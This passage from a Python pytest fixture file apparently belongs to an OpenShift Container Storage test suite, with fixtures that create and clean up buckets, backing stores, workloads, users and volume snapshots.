Args:
amount (int): The amount of buckets to create
interface (str): The interface to use for creation of buckets.
S3 | OC | CLI | NAMESPACE
verify_health (bool): Whether to verify the created bucket's health
post-creation
bucketclass (dict): A dictionary describing a new
bucketclass to be created.
When None, the default bucketclass is used.
Returns:
list: A list of s3.Bucket objects, containing all the created
buckets
"""
if interface.lower() not in BUCKET_MAP:
raise RuntimeError(
f"Invalid interface type received: {interface}. "
f'available types: {", ".join(BUCKET_MAP.keys())}'
)
bucketclass = (
bucketclass if bucketclass is None else bucket_class_factory(bucketclass)
)
for i in range(amount):
bucket_name = helpers.create_unique_resource_name(
resource_description="bucket", resource_type=interface.lower()
)
created_bucket = BUCKET_MAP[interface.lower()](
bucket_name,
mcg=mcg_obj,
rgw=rgw_obj,
bucketclass=bucketclass,
*args,
**kwargs,
)
created_buckets.append(created_bucket)
if verify_health:
created_bucket.verify_health()
return created_buckets
def bucket_cleanup():
for bucket in created_buckets:
log.info(f"Cleaning up bucket {bucket.name}")
try:
bucket.delete()
except ClientError as e:
if e.response["Error"]["Code"] == "NoSuchBucket":
log.warning(f"{bucket.name} could not be found in cleanup")
else:
raise
request.addfinalizer(bucket_cleanup)
return _create_buckets
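# Usage sketch (illustrative only): create three OC buckets on a mirrored
# bucketclass; the bucketclass dict format follows the one used by
# multiregion_mirror_setup_fixture further below.
#
#     def test_with_buckets(bucket_factory):
#         bucketclass = {
#             "interface": "OC",
#             "backingstore_dict": {"aws": [(1, "us-west-1"), (1, "us-east-2")]},
#             "placement_policy": "Mirror",
#         }
#         buckets = bucket_factory(amount=3, interface="OC", bucketclass=bucketclass)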
@pytest.fixture(scope="class")
def cloud_uls_factory(request, cld_mgr):
"""
Create an Underlying Storage factory.
Calling this fixture creates a new underlying storage(s).
Returns:
func: Factory method - each call to this function creates
an Underlying Storage factory
"""
return cloud_uls_factory_implementation(request, cld_mgr)
@pytest.fixture(scope="session")
def cloud_uls_factory_session(request, cld_mgr):
"""
Create an Underlying Storage factory.
Calling this fixture creates a new underlying storage(s).
Returns:
func: Factory method - each call to this function creates
an Underlying Storage factory
"""
return cloud_uls_factory_implementation(request, cld_mgr)
@pytest.fixture(scope="function")
def mcg_job_factory(request, bucket_factory, project_factory, mcg_obj, tmp_path):
"""
Create a Job factory.
Calling this fixture creates a new Job(s) that utilize MCG bucket.
Returns:
func: Factory method - each call to this function creates
a job
"""
return mcg_job_factory_implementation(
request, bucket_factory, project_factory, mcg_obj, tmp_path
)
@pytest.fixture(scope="session")
def mcg_job_factory_session(
request, bucket_factory_session, project_factory_session, mcg_obj_session, tmp_path
):
"""
Create a Job factory.
Calling this fixture creates a new Job(s) that utilize MCG bucket.
Returns:
func: Factory method - each call to this function creates
a job
"""
return mcg_job_factory_implementation(
request,
bucket_factory_session,
project_factory_session,
mcg_obj_session,
tmp_path,
)
@pytest.fixture()
def backingstore_factory(request, cld_mgr, mcg_obj, cloud_uls_factory):
"""
Create a Backing Store factory.
Calling this fixture creates a new Backing Store(s).
Returns:
func: Factory method - each call to this function creates
a backingstore
None: If MCG object not found
"""
if mcg_obj:
return backingstore_factory_implementation(
request, cld_mgr, mcg_obj, cloud_uls_factory
)
else:
return None
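# Usage sketch (assumption: the implementation returned above accepts a
# creation method and a dict mapping cloud providers to (amount, region)
# tuples, similar to the backingstore_dict used elsewhere in this file):
#
#     def test_with_backingstore(backingstore_factory):
#         stores = backingstore_factory("OC", {"aws": [(1, "us-east-2")]})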
@pytest.fixture(scope="session")
def backingstore_factory_session(
request, cld_mgr, mcg_obj_session, cloud_uls_factory_session
):
"""
Create a Backing Store factory.
Calling this fixture creates a new Backing Store(s).
Returns:
func: Factory method - each call to this function creates
a backingstore
None: If session-scoped MCG object not found
"""
if mcg_obj_session:
return backingstore_factory_implementation(
request, cld_mgr, mcg_obj_session, cloud_uls_factory_session
)
else:
return None
@pytest.fixture()
def bucket_class_factory(
request, mcg_obj, backingstore_factory, namespace_store_factory
):
"""
Create a Bucket Class factory.
Calling this fixture creates a new Bucket Class.
Returns:
func: Factory method - each call to this function creates
a bucketclass
None: If MCG object not found
"""
if mcg_obj:
return bucketclass_factory_implementation(
request, mcg_obj, backingstore_factory, namespace_store_factory
)
else:
return None
@pytest.fixture(scope="session")
def bucket_class_factory_session(
request,
mcg_obj_session,
backingstore_factory_session,
namespace_store_factory_session,
):
"""
Create a Bucket Class factory.
Calling this fixture creates a new Bucket Class.
Returns:
func: Factory method - each call to this function creates
a bucketclass
None: If session-scoped MCG object not found
"""
if mcg_obj_session:
return bucketclass_factory_implementation(
request,
mcg_obj_session,
backingstore_factory_session,
namespace_store_factory_session,
)
else:
return None
@pytest.fixture()
def multiregion_mirror_setup(bucket_factory):
return multiregion_mirror_setup_fixture(bucket_factory)
@pytest.fixture(scope="session")
def multiregion_mirror_setup_session(bucket_factory_session):
return multiregion_mirror_setup_fixture(bucket_factory_session)
def multiregion_mirror_setup_fixture(bucket_factory):
# Setup
# Todo:
# add region and amount parametrization - note that `us-east-1`
# will cause an error as it is the default region. If usage of `us-east-1`
# needs to be tested, keep the 'region' field out.
bucketclass = {
"interface": "CLI",
"backingstore_dict": {"aws": [(1, "us-west-1"), (1, "us-east-2")]},
"placement_policy": "Mirror",
}
# Create a NooBucket that'll use the bucket class in order to test
# the mirroring policy
bucket = bucket_factory(1, "OC", bucketclass=bucketclass)[0]
return bucket, bucket.bucketclass.backingstores
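# A minimal usage sketch for multiregion_mirror_setup (illustrative only - the
# test name and assertion flow are hypothetical, not part of this module):
#
#   def test_mirroring(multiregion_mirror_setup):
#       bucket, backingstores = multiregion_mirror_setup
#       # exercise the bucket and verify that data is mirrored across the
#       # two AWS underlying storages created by the bucketclass above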
@pytest.fixture(scope="session")
def default_storageclasses(request, teardown_factory_session):
"""
Returns a dictionary of storageclasses. Keys represent the reclaim policy of
the storageclass. There are two storageclasses for each key: the first is RBD
based and the second is CephFS based. Storageclasses with the Retain reclaim
policy are created from the default storageclasses.
"""
scs = {constants.RECLAIM_POLICY_DELETE: [], constants.RECLAIM_POLICY_RETAIN: []}
# TODO(fbalak): Use proper constants after
# https://github.com/red-hat-storage/ocs-ci/issues/1056
# is resolved
for sc_name in ("ocs-storagecluster-ceph-rbd", "ocs-storagecluster-cephfs"):
sc = OCS(kind=constants.STORAGECLASS, metadata={"name": sc_name})
sc.reload()
scs[constants.RECLAIM_POLICY_DELETE].append(sc)
sc.data["reclaimPolicy"] = constants.RECLAIM_POLICY_RETAIN
sc.data["metadata"]["name"] += "-retain"
sc._name = sc.data["metadata"]["name"]
sc.create()
teardown_factory_session(sc)
scs[constants.RECLAIM_POLICY_RETAIN].append(sc)
return scs
@pytest.fixture(scope="class")
def install_logging(request):
"""
Setup and teardown
* The setup will deploy openshift-logging in the cluster
* The teardown will uninstall cluster-logging from the cluster
"""
def finalizer():
uninstall_cluster_logging()
request.addfinalizer(finalizer)
csv = ocp.OCP(
kind=constants.CLUSTER_SERVICE_VERSION,
namespace=constants.OPENSHIFT_LOGGING_NAMESPACE,
)
logging_csv = csv.get().get("items")
if logging_csv:
log.info("Logging is already configured, Skipping Installation")
return
log.info("Configuring Openshift-logging")
# Checks OCP version
ocp_version = get_running_ocp_version()
# Creates namespace openshift-operators-redhat
ocp_logging_obj.create_namespace(yaml_file=constants.EO_NAMESPACE_YAML)
# Creates an operator-group for elasticsearch
assert ocp_logging_obj.create_elasticsearch_operator_group(
yaml_file=constants.EO_OG_YAML, resource_name="openshift-operators-redhat"
)
# Set RBAC policy on the project
assert ocp_logging_obj.set_rbac(
yaml_file=constants.EO_RBAC_YAML, resource_name="prometheus-k8s"
)
# Creates subscription for elastic-search operator
subscription_yaml = templating.load_yaml(constants.EO_SUB_YAML)
subscription_yaml["spec"]["channel"] = ocp_version
helpers.create_resource(**subscription_yaml)
assert ocp_logging_obj.get_elasticsearch_subscription()
# Creates a namespace openshift-logging
ocp_logging_obj.create_namespace(yaml_file=constants.CL_NAMESPACE_YAML)
# Creates an operator-group for cluster-logging
assert ocp_logging_obj.create_clusterlogging_operator_group(
yaml_file=constants.CL_OG_YAML
)
# Creates subscription for cluster-logging
cl_subscription = templating.load_yaml(constants.CL_SUB_YAML)
cl_subscription["spec"]["channel"] = ocp_version
helpers.create_resource(**cl_subscription)
assert ocp_logging_obj.get_clusterlogging_subscription()
# Creates instance in namespace openshift-logging
cluster_logging_operator = OCP(
kind=constants.POD, namespace=constants.OPENSHIFT_LOGGING_NAMESPACE
)
log.info(f"The cluster-logging-operator {cluster_logging_operator.get()}")
ocp_logging_obj.create_instance()
@pytest.fixture
def fio_pvc_dict():
"""
PVC template for fio workloads.
Note that all 'None' values need to be defined before usage.
"""
return fio_artefacts.get_pvc_dict()
@pytest.fixture(scope="session")
def fio_pvc_dict_session():
"""
PVC template for fio workloads.
Note that all 'None' values need to be defined before usage.
"""
return fio_artefacts.get_pvc_dict()
@pytest.fixture
def fio_configmap_dict():
"""
ConfigMap template for fio workloads.
Note that you need to add actual configuration to workload.fio file.
"""
return fio_artefacts.get_configmap_dict()
@pytest.fixture(scope="session")
def fio_configmap_dict_session():
"""
ConfigMap template for fio workloads.
Note that you need to add actual configuration to workload.fio file.
"""
return fio_artefacts.get_configmap_dict()
@pytest.fixture
def fio_job_dict():
"""
Job template for fio workloads.
"""
return fio_artefacts.get_job_dict()
@pytest.fixture(scope="session")
def fio_job_dict_session():
"""
Job template for fio workloads.
"""
return fio_artefacts.get_job_dict()
@pytest.fixture(scope="function")
def pgsql_factory_fixture(request):
"""
Pgsql factory fixture
"""
pgsql = Postgresql()
def factory(
replicas,
clients=None,
threads=None,
transactions=None,
scaling_factor=None,
timeout=None,
sc_name=None,
):
"""
Factory to start pgsql workload
Args:
replicas (int): Number of pgbench pods to be deployed
clients (int): Number of clients
threads (int): Number of threads
transactions (int): Number of transactions
scaling_factor (int): scaling factor
timeout (int): Time in seconds to wait
"""
# Setup postgres
pgsql.setup_postgresql(replicas=replicas, sc_name=sc_name)
# Create pgbench benchmark
pgsql.create_pgbench_benchmark(
replicas=replicas,
clients=clients,
threads=threads,
transactions=transactions,
scaling_factor=scaling_factor,
timeout=timeout,
)
# Wait for the pgbench pod to initialize and complete
pgsql.wait_for_pgbench_status(status=constants.STATUS_COMPLETED)
# Get pgbench pods
pgbench_pods = pgsql.get_pgbench_pods()
# Validate pgbench run and parse logs
pgsql.validate_pgbench_run(pgbench_pods)
return pgsql
def finalizer():
"""
Clean up
"""
pgsql.cleanup()
request.addfinalizer(finalizer)
return factory
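# A minimal usage sketch for pgsql_factory_fixture (illustrative only - the
# test name and argument values are hypothetical):
#
#   def test_pgsql_workload(pgsql_factory_fixture):
#       pgsql = pgsql_factory_fixture(
#           replicas=3, clients=3, transactions=600, timeout=1200
#       )
#       # pgbench has already run and been validated by the factory here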
@pytest.fixture(scope="function")
def jenkins_factory_fixture(request):
"""
Jenkins factory fixture
"""
jenkins = Jenkins()
def factory(num_projects=1, num_of_builds=1):
"""
Factory to start jenkins workload
Args:
num_projects (int): Number of Jenkins projects
num_of_builds (int): Number of builds per project
"""
# Jenkins template
jenkins.create_ocs_jenkins_template()
# Init number of projects
jenkins.number_projects = num_projects
# Create app jenkins
jenkins.create_app_jenkins()
# Create jenkins pvc
jenkins.create_jenkins_pvc()
# Create jenkins build config
jenkins.create_jenkins_build_config()
# Wait for the jenkins deploy pod to reach the Completed state
jenkins.wait_for_jenkins_deploy_status(status=constants.STATUS_COMPLETED)
# Init number of builds per project
jenkins.number_builds_per_project = num_of_builds
# Start Builds
jenkins.start_build()
# Wait for the builds to reach the 'Complete' state
jenkins.wait_for_build_to_complete()
# Print table of builds
jenkins.print_completed_builds_results()
return jenkins
def finalizer():
"""
Clean up
"""
jenkins.cleanup()
request.addfinalizer(finalizer)
return factory
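# A minimal usage sketch for jenkins_factory_fixture (illustrative only - the
# test name and argument values are hypothetical):
#
#   def test_jenkins_workload(jenkins_factory_fixture):
#       jenkins = jenkins_factory_fixture(num_projects=2, num_of_builds=3)
#       # all builds have completed by the time the factory returns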
@pytest.fixture(scope="function")
def couchbase_factory_fixture(request):
"""
Couchbase factory fixture
"""
couchbase = CouchBase()
def factory(replicas=3, run_in_bg=False, skip_analyze=True, sc_name=None):
"""
Factory to start couchbase workload
Args:
replicas (int): Number of couchbase workers to be deployed
run_in_bg (bool): Run IOs in background as option
skip_analyze (bool): Skip logs analysis as option
"""
# Setup couchbase
couchbase.setup_cb()
# Create couchbase workers
couchbase.create_couchbase_worker(replicas=replicas, sc_name=sc_name)
# Run couchbase workload
couchbase.run_workload(replicas=replicas, run_in_bg=run_in_bg)
# Run sanity check on data logs
couchbase.analyze_run(skip_analyze=skip_analyze)
return couchbase
def finalizer():
"""
Clean up
"""
couchbase.teardown()
request.addfinalizer(finalizer)
return factory
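# A minimal usage sketch for couchbase_factory_fixture (illustrative only -
# the test name and argument values are hypothetical):
#
#   def test_couchbase_workload(couchbase_factory_fixture):
#       couchbase = couchbase_factory_fixture(replicas=3, run_in_bg=False)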
@pytest.fixture(scope="function")
def amq_factory_fixture(request):
"""
AMQ factory fixture
"""
amq = AMQ()
def factory(
sc_name,
kafka_namespace=constants.AMQ_NAMESPACE,
size=100,
replicas=3,
topic_name="my-topic",
user_name="my-user",
partitions=1,
topic_replicas=1,
num_of_producer_pods=1,
num_of_consumer_pods=1,
value="10000",
since_time=1800,
):
"""
Factory to start amq workload
Args:
sc_name (str): Name of the storage class
kafka_namespace (str): Namespace where kafka cluster to be created
size (int): Size of the storage
replicas (int): Number of kafka and zookeeper pods to be created
topic_name (str): Name of the topic to be created
user_name (str): Name of the user to be created
partitions (int): Number of partitions of topic
topic_replicas (int): Number of replicas of topic
num_of_producer_pods (int): Number of producer pods to be created
num_of_consumer_pods (int): Number of consumer pods to be created
value (str): Number of messages to be sent and received
since_time (int): Number of seconds required to send the msg
"""
# Setup kafka cluster
amq.setup_amq_cluster(
sc_name=sc_name, namespace=kafka_namespace, size=size, replicas=replicas
)
# Run open messages
amq.create_messaging_on_amq(
topic_name=topic_name,
user_name=user_name,
partitions=partitions,
replicas=topic_replicas,
num_of_producer_pods=num_of_producer_pods,
num_of_consumer_pods=num_of_consumer_pods,
value=value,
)
# Wait for some time to generate msg
waiting_time = 60
log.info(f"Waiting for {waiting_time}sec to generate msg")
time.sleep(waiting_time)
# Check messages are sent and received
threads = amq.run_in_bg(
namespace=kafka_namespace, value=value, since_time=since_time
)
return amq, threads
def finalizer():
"""
Clean up
"""
# Clean up
amq.cleanup()
request.addfinalizer(finalizer)
return factory
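# A minimal usage sketch for amq_factory_fixture (illustrative only - the test
# name is hypothetical and the storage class name is just an example):
#
#   def test_amq_workload(amq_factory_fixture):
#       amq, threads = amq_factory_fixture(sc_name="ocs-storagecluster-ceph-rbd")
#       # 'threads' are the background message checkers started by amq.run_in_bg()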
@pytest.fixture
def measurement_dir(tmp_path):
"""
Returns the directory path where all measurement results should be stored.
If 'measurement_dir' is provided by the config then it is used, otherwise a
new directory is generated.
Returns:
str: Path to measurement directory
"""
if config.ENV_DATA.get("measurement_dir"):
measurement_dir = config.ENV_DATA.get("measurement_dir")
log.info(f"Using measurement dir from configuration: {measurement_dir}")
else:
measurement_dir = os.path.join(os.path.dirname(tmp_path), "measurement_results")
if not os.path.exists(measurement_dir):
log.info(f"Measurement dir {measurement_dir} doesn't exist. Creating it.")
os.mkdir(measurement_dir)
return measurement_dir
@pytest.fixture()
def multi_dc_pod(multi_pvc_factory, dc_pod_factory, service_account_factory):
"""
Prepare multiple dc pods for the test
Returns:
list: Pod instances
"""
def factory(
num_of_pvcs=1,
pvc_size=100,
project=None,
access_mode="RWO",
pool_type="rbd",
timeout=60,
):
dict_modes = {
"RWO": "ReadWriteOnce",
"RWX": "ReadWriteMany",
"RWX-BLK": "ReadWriteMany-Block",
}
dict_types = {"rbd": "CephBlockPool", "cephfs": "CephFileSystem"}
if access_mode in "RWX-BLK" and pool_type in "rbd":
modes = dict_modes["RWX-BLK"]
create_rbd_block_rwx_pod = True
else:
modes = dict_modes[access_mode]
create_rbd_block_rwx_pod = False
pvc_objs = multi_pvc_factory(
interface=dict_types[pool_type],
access_modes=[modes],
size=pvc_size,
num_of_pvc=num_of_pvcs,
project=project,
timeout=timeout,
)
dc_pods = []
dc_pods_res = []
sa_obj = service_account_factory(project=project)
with ThreadPoolExecutor() as p:
for pvc_obj in pvc_objs:
if create_rbd_block_rwx_pod:
dc_pods_res.append(
p.submit(
dc_pod_factory,
interface=constants.CEPHBLOCKPOOL,
pvc=pvc_obj,
raw_block_pv=True,
sa_obj=sa_obj,
)
)
else:
dc_pods_res.append(
p.submit(
dc_pod_factory,
interface=dict_types[pool_type],
pvc=pvc_obj,
sa_obj=sa_obj,
)
)
for dc in dc_pods_res:
pod_obj = dc.result()
if create_rbd_block_rwx_pod:
log.info(
"#### setting attribute pod_type since "
f"create_rbd_block_rwx_pod = {create_rbd_block_rwx_pod}"
)
setattr(pod_obj, "pod_type", "rbd_block_rwx")
else:
setattr(pod_obj, "pod_type", "")
dc_pods.append(pod_obj)
with ThreadPoolExecutor() as p:
for dc in dc_pods:
p.submit(
helpers.wait_for_resource_state,
resource=dc,
state=constants.STATUS_RUNNING,
timeout=120,
)
return dc_pods
return factory
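# A minimal usage sketch for multi_dc_pod (illustrative only - the test name
# and argument values are hypothetical):
#
#   def test_dc_pods(multi_dc_pod, project_factory):
#       project = project_factory()
#       pods = multi_dc_pod(
#           num_of_pvcs=3, pvc_size=10, project=project,
#           access_mode="RWX", pool_type="cephfs",
#       )
#       # all returned DC pods are already in the Running state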
@pytest.fixture(scope="session")
def htpasswd_path(tmpdir_factory):
"""
Returns:
string: Path to HTPasswd file with additional usernames
"""
return str(tmpdir_factory.mktemp("idp_data").join("users.htpasswd"))
@pytest.fixture(scope="session")
def htpasswd_identity_provider(request):
"""
Creates HTPasswd Identity provider.
Returns:
object: OCS object representing OCP OAuth object with HTPasswd IdP
"""
users.create_htpasswd_idp()
cluster = OCS(kind=constants.OAUTH, metadata={"name": "cluster"})
cluster.reload()
def finalizer():
"""
Remove HTPasswd IdP
"""
# TODO(fbalak): remove HTPasswd identityProvider
# cluster.ocp.patch(
# resource_name='cluster',
# params=f'[{ "op": "remove", "path": "/spec/identityProviders" }]'
# )
# users.delete_htpasswd_secret()
request.addfinalizer(finalizer)
return cluster
@pytest.fixture(scope="function")
def user_factory(request, htpasswd_identity_provider, htpasswd_path):
return users.user_factory(request, htpasswd_path)
@pytest.fixture(scope="session")
def user_factory_session(request, htpasswd_identity_provider, htpasswd_path):
return users.user_factory(request, htpasswd_path)
@pytest.fixture(autouse=True)
def log_alerts(request):
"""
Log alerts at the beginning and end of each test case. At the end of the
test case, print the difference: which new alerts were raised while the
test ran.
"""
teardown = config.RUN["cli_params"].get("teardown")
if teardown:
return
alerts_before = []
prometheus = None
try:
prometheus = PrometheusAPI()
except Exception:
log.exception("There was a problem with connecting to Prometheus")
def _collect_alerts():
try:
alerts_response = prometheus.get(
"alerts", payload={"silenced": False, "inhibited": False}
)
if alerts_response.ok:
alerts = alerts_response.json().get("data").get("alerts")
log.debug(f"Found alerts: {alerts}")
return alerts
else:
log.warning(
f"There was a problem with collecting alerts for analysis: {alerts_response.text}"
)
return False
except Exception:
log.exception("There was a problem with collecting alerts for analysis")
return False
def _print_diff():
if alerts_before:
alerts_after = _collect_alerts()
if alerts_after:
alerts_new = [
alert for alert in alerts_after if alert not in alerts_before
]
if alerts_new:
log.warning("During test were raised new alerts")
log.warning(alerts_new)
alerts_before = _collect_alerts()
request.addfinalizer(_print_diff)
@pytest.fixture(scope="session", autouse=True)
def ceph_toolbox(request):
"""
This fixture creates the ceph toolbox pod for manually created deployments
if it does not already exist.
"""
deploy = config.RUN["cli_params"]["deploy"]
teardown = config.RUN["cli_params"].get("teardown")
skip_ocs = config.ENV_DATA["skip_ocs_deployment"]
deploy_teardown = deploy or teardown
ocp_dedicated = (
config.ENV_DATA["platform"].lower() == constants.OPENSHIFT_DEDICATED_PLATFORM
)
if not (deploy_teardown or skip_ocs) or (ocp_dedicated and not deploy_teardown):
try:
# Creating toolbox pod
setup_ceph_toolbox()
except CommandFailed:
log.info("Failed to create toolbox")
@pytest.fixture(scope="function")
def node_drain_teardown(request):
"""
Tear down function after Node drain
"""
def finalizer():
"""
Make sure that all cluster's nodes are in 'Ready' state and if not,
change them back to 'Ready' state by marking them as schedulable
"""
scheduling_disabled_nodes = [
n.name
for n in get_node_objs()
if n.ocp.get_resource_status(n.name)
== constants.NODE_READY_SCHEDULING_DISABLED
]
if scheduling_disabled_nodes:
schedule_nodes(scheduling_disabled_nodes)
ceph_health_check(tries=60)
request.addfinalizer(finalizer)
@pytest.fixture(scope="function")
def node_restart_teardown(request, nodes):
"""
Make sure all nodes are up again
Make sure that all cluster's nodes are in 'Ready' state and if not,
change them back to 'Ready' state by restarting the nodes
"""
def finalizer():
# Start the powered off nodes
nodes.restart_nodes_by_stop_and_start_teardown()
try:
node.wait_for_nodes_status(status=constants.NODE_READY)
except ResourceWrongStatusException:
# Restart the nodes if in NotReady state
not_ready_nodes = [
n
for n in node.get_node_objs()
if n.ocp.get_resource_status(n.name) == constants.NODE_NOT_READY
]
if not_ready_nodes:
log.info(
f"Nodes in NotReady status found: {[n.name for n in not_ready_nodes]}"
)
nodes.restart_nodes(not_ready_nodes)
node.wait_for_nodes_status(status=constants.NODE_READY)
request.addfinalizer(finalizer)
@pytest.fixture()
def mcg_connection_factory(request, mcg_obj, cld_mgr):
"""
Create a new MCG connection for the given platform. If a connection already
exists for the platform then the previously created connection is returned.
"""
created_connections = {}
def _create_connection(platform=constants.AWS_PLATFORM, name=None):
"""
Args:
platform (str): Platform used for connection
name (str): New connection name. If not provided then new name will
be generated. New name will be used only if there is not
existing connection for given platform
Returns:
str: connection name
"""
if platform not in created_connections:
connection_name = name or create_unique_resource_name(
constants.MCG_CONNECTION, platform
)
mcg_obj.create_connection(cld_mgr, platform, connection_name)
created_connections[platform] = connection_name
return created_connections[platform]
def _connections_cleanup():
for platform in created_connections:
mcg_obj.delete_ns_connection(created_connections[platform])
request.addfinalizer(_connections_cleanup)
return _create_connection
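# A minimal usage sketch for mcg_connection_factory (illustrative only - the
# test name is hypothetical):
#
#   def test_connection(mcg_connection_factory):
#       conn_name = mcg_connection_factory(platform=constants.AWS_PLATFORM)
#       # a second call for the same platform returns the same connection name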
@pytest.fixture()
def ns_resource_factory(
request, mcg_obj, cld_mgr, cloud_uls_factory, mcg_connection_factory
):
"""
Create a namespace resource factory. Calling this fixture creates a new namespace resource.
"""
created_ns_resources = []
def _create_ns_resources(platform=constants.AWS_PLATFORM):
# Create random connection_name
rand_connection = mcg_connection_factory(platform)
# Create the actual namespace resource
rand_ns_resource = create_unique_resource_name(
constants.MCG_NS_RESOURCE, platform
)
if platform == constants.RGW_PLATFORM:
region = None
else:
# TODO: fix this when https://github.com/red-hat-storage/ocs-ci/issues/3338
# is resolved
region = "us-east-2"
target_bucket_name = mcg_obj.create_namespace_resource(
rand_ns_resource,
rand_connection,
region,
cld_mgr,
cloud_uls_factory,
platform,
)
log.info(f"Check validity of NS resource {rand_ns_resource}")
if platform == constants.AWS_PLATFORM:
endpoint = constants.MCG_NS_AWS_ENDPOINT
elif platform == constants.AZURE_PLATFORM:
endpoint = constants.MCG_NS_AZURE_ENDPOINT
elif platform == constants.RGW_PLATFORM:
rgw_conn = RGW()
endpoint, _, _ = rgw_conn.get_credentials()
else:
raise UnsupportedPlatformError(f"Unsupported Platform: {platform}")
mcg_obj.check_ns_resource_validity(
rand_ns_resource, target_bucket_name, endpoint
)
created_ns_resources.append(rand_ns_resource)
return target_bucket_name, rand_ns_resource
def ns_resources_cleanup():
for ns_resource in created_ns_resources:
mcg_obj.delete_ns_resource(ns_resource)
request.addfinalizer(ns_resources_cleanup)
return _create_ns_resources
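# A minimal usage sketch for ns_resource_factory (illustrative only - the test
# name is hypothetical):
#
#   def test_ns_resource(ns_resource_factory):
#       target_bucket_name, ns_resource = ns_resource_factory(
#           platform=constants.AWS_PLATFORM
#       )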
@pytest.fixture()
def namespace_store_factory(request, cld_mgr, mcg_obj, cloud_uls_factory):
"""
Create a Namespace Store factory.
Calling this fixture creates new Namespace Store(s).
Returns:
func: Factory method - each call to this function creates
a namespacestore
"""
return namespacestore_factory_implementation(
request, cld_mgr, mcg_obj, cloud_uls_factory
)
@pytest.fixture(scope="session")
def namespace_store_factory_session(
request, cld_mgr, mcg_obj_session, cloud_uls_factory_session
):
"""
Create a Namespace Store factory.
Calling this fixture creates new Namespace Store(s).
Returns:
func: Factory method - each call to this function creates
a namespacestore
"""
return namespacestore_factory_implementation(
request, cld_mgr, mcg_obj_session, cloud_uls_factory_session
)
@pytest.fixture()
def snapshot_factory(request):
"""
Snapshot factory. Calling this fixture creates a volume snapshot from the
specified PVC
"""
instances = []
def factory(pvc_obj, wait=True, snapshot_name=None):
"""
Args:
pvc_obj (PVC): PVC object from which snapshot has to be created
wait (bool): True to wait for snapshot to be ready, False otherwise
snapshot_name (str): Name to be provided for snapshot
Returns:
OCS: OCS instance of kind VolumeSnapshot
"""
snap_obj = pvc_obj.create_snapshot(snapshot_name=snapshot_name, wait=wait)
return snap_obj
def finalizer():
"""
Delete the snapshots
"""
snapcontent_objs = []
# Get VolumeSnapshotContent form VolumeSnapshots and delete
# VolumeSnapshots
for instance in instances:
if not instance.is_deleted:
snapcontent_objs.append(
helpers.get_snapshot_content_obj(snap_obj=instance)
)
instance.delete()
instance.ocp.wait_for_delete(instance.name)
# Wait for VolumeSnapshotContents to be deleted
for snapcontent_obj in snapcontent_objs:
snapcontent_obj.ocp.wait_for_delete(
resource_name=snapcontent_obj.name, timeout=240
)
request.addfinalizer(finalizer)
return factory
@pytest.fixture()
def multi_snapshot_factory(snapshot_factory):
"""
Snapshot factory. Calling this fixture creates volume snapshots of each
PVC in the provided list
"""
def factory(pvc_obj, wait=True, snapshot_name_suffix=None):
"""
Args:
pvc_obj (list): List of PVC objects from which snapshots have to be created
wait (bool): True to wait for snapshot to be ready, False otherwise
snapshot_name_suffix (str): Suffix to be added to snapshot
Returns:
OCS: List of OCS instances of kind VolumeSnapshot
"""
snapshot = []
for obj in pvc_obj:
log.info(f"Creating snapshot of PVC {obj.name}")
snapshot_name = (
f"{obj.name}-{snapshot_name_suffix}" if snapshot_name_suffix else None
)
snap_obj = snapshot_factory(
pvc_obj=obj, snapshot_name=snapshot_name, wait=wait
)
snapshot.append(snap_obj)
return snapshot
return factory
@pytest.fixture()
def snapshot_restore_factory(request):
"""
Snapshot restore factory. Calling this fixture creates a new PVC out of the
specified VolumeSnapshot.
"""
instances = []
def factory(
snapshot_obj,
restore_pvc_name=None,
storageclass=None,
size=None,
volume_mode=None,
restore_pvc_yaml=None,
access_mode=constants.ACCESS_MODE_RWO,
status=constants.STATUS_BOUND,
):
"""
Args:
snapshot_obj (OCS): OCS instance of kind VolumeSnapshot which has
to be restored to new PVC
restore_pvc_name (str): Name to be provided for restored pvc
storageclass (str): Name of storageclass
size (str): Size of PVC being created. eg: 5Gi. Ideally, this
should be same as the restore size of snapshot. Adding this
parameter to consider negative test scenarios.
volume_mode (str): Volume mode for PVC. This should match the
volume mode of parent PVC.
restore_pvc_yaml (str): The location of pvc-restore.yaml
access_mode (str): This decides the access mode to be used for the
PVC. ReadWriteOnce is default.
status (str): If provided then factory waits for the PVC to reach
desired state.
Returns:
PVC: Restored PVC object
"""
snapshot_info = snapshot_obj.get()
size = size or snapshot_info["status"]["restoreSize"]
restore_pvc_name = restore_pvc_name or (
helpers.create_unique_resource_name(snapshot_obj.name, "restore")
)
if snapshot_info["spec"]["volumeSnapshotClassName"] == (
helpers.default_volumesnapshotclass(constants.CEPHBLOCKPOOL).name
):
storageclass = (
storageclass
or helpers.default_storage_class(constants.CEPHBLOCKPOOL).name
)
restore_pvc_yaml = restore_pvc_yaml or constants.CSI_RBD_PVC_RESTORE_YAML
interface = constants.CEPHBLOCKPOOL
elif snapshot_info["spec"]["volumeSnapshotClassName"] == (
helpers.default_volumesnapshotclass(constants.CEPHFILESYSTEM).name
):
storageclass = (
storageclass
or helpers.default_storage_class(constants.CEPHFILESYSTEM).name
)
restore_pvc_yaml = restore_pvc_yaml or constants.CSI_CEPHFS_PVC_RESTORE_YAML
interface = constants.CEPHFILESYSTEM
restored_pvc = create_restore_pvc(
sc_name=storageclass,
snap_name=snapshot_obj.name,
namespace=snapshot_obj.namespace,
size=size,
pvc_name=restore_pvc_name,
volume_mode=volume_mode,
restore_pvc_yaml=restore_pvc_yaml,
access_mode=access_mode,
)
instances.append(restored_pvc)
restored_pvc.snapshot = snapshot_obj
restored_pvc.interface = interface
if status:
helpers.wait_for_resource_state(restored_pvc, status)
return restored_pvc
def finalizer():
"""
Delete the PVCs
"""
pv_objs = []
# Get PV form PVC instances and delete PVCs
for instance in instances:
if not instance.is_deleted:
pv_objs.append(instance.backed_pv_obj)
instance.delete()
instance.ocp.wait_for_delete(instance.name)
# Wait for PVs to delete
helpers.wait_for_pv_delete(pv_objs)
request.addfinalizer(finalizer)
return factory
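# A minimal usage sketch combining snapshot_factory and snapshot_restore_factory
# (illustrative only - the test name and the pvc_factory usage are hypothetical):
#
#   def test_snapshot_restore(pvc_factory, snapshot_factory, snapshot_restore_factory):
#       pvc_obj = pvc_factory()
#       snap_obj = snapshot_factory(pvc_obj)
#       restored_pvc = snapshot_restore_factory(snapshot_obj=snap_obj)
#       # restored_pvc is Bound (status=constants.STATUS_BOUND by default)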
@pytest.fixture()
def multi_snapshot_restore_factory(snapshot_restore_factory):
"""
Snapshot restore factory. Calling this fixture creates a set of new PVCs,
one from each VolumeSnapshot provided in the list.
"""
def factory(
snapshot_obj,
restore_pvc_suffix=None,
storageclass=None,
